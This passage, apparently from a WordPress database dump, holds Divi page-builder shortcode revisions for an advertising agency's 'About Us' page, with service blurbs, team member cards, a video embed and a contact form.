module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:26:06','2020-08-07 19:26:06','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(558,1,'2020-08-07 19:26:23','2020-08-07 19:26:23','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" 